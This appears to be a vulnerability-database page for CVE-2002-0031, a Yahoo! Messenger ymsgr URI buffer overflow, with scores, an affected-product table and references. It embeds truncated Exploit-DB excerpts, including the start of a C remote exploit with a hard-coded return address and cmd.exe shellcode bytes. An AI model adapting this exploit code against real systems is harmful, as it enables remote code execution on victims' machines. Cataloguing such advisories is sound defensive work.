CVE-2002-0031
published 2002-07-26CVE-2002-0031: Buffer overflows in Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary code via a ymsgr URI with long arguments to (1) call…
PriorityP428medium4.6CVSS 2.0
AVLACLAuNCPIPAP
EXPLOIT
EPSS
4.94%
91.1th percentile
Buffer overflows in Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary code via a ymsgr URI with long arguments to (1) call, (2) sendim, (3) getimv, (4) chat, (5) addview, or (6) addfriend.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yahoo | messenger | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Overflow
exploitdb·2003-06-23
CVE-2002-0031 Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Overflow
Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Overflow
---
/*
*
* ---[ Remote yahoo Messenger V5.5 exploiter on Windows XP ]---
*
* Dtors Security Research (DSR)
* Code by: Rave
*
* The buffer looks like this
*
* |-
* ^__________^
*
*
*/
#include
#include
#include
#include
#include /* These are the usual header files */
#include
#include
#include
#define MAXDATASIZE 555 /* Max number of bytes of data */
#define BACKLOG 200 /* Number of allowed connections */
static int port =80;
/* library entry inside msvcrt.dll to jmp 0xc (EB0C); */
char sraddress[8]="\x16\xd8\xE8\x77";
/* This shellcode just executes cmd.exe nothing special here..
* the victim gets a cmd shell on his desktop :) lol ! \
*/
unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
Exploit-DB
Yahoo! Messenger 5.0 - Call Center Buffer Overflow
exploitdb·2002-05-27
CVE-2002-0031 Yahoo! Messenger 5.0 - Call Center Buffer Overflow
Yahoo! Messenger 5.0 - Call Center Buffer Overflow
---
// source: https://www.securityfocus.com/bid/4837/info
Yahoo! Messenger configures the 'ymsgr:' URI handler when it is installed. The handler invokes YPAGER.EXE with the supplied parameters. YPAGER.EXE accepts the 'call' argument; it is used for starting the 'Call Center' feature.
There is a stack overrun condition in the 'Call Center' component that may be exploited through a specially constructed URI. It has been reported that the stack frame of the affected function will be corrupted if the argument to the 'call' parameter passed to YPAGER.EXE is of 268 bytes or greater in length.
Attackers may exploit this vulnerability to execute arbitrary code.
/* Yahpoo.c by [email protected] [www.dtors.net] [DSR]
*
* Why Yahoo Messenger have
No writeups or analysis indexed.
http://online.securityfocus.com/archive/1/274223http://www.cert.org/advisories/CA-2002-16.htmlhttp://www.kb.cert.org/vuls/id/137115http://www.securityfocus.com/bid/4837http://online.securityfocus.com/archive/1/274223http://www.cert.org/advisories/CA-2002-16.htmlhttp://www.kb.cert.org/vuls/id/137115http://www.securityfocus.com/bid/4837
2002-07-26
Published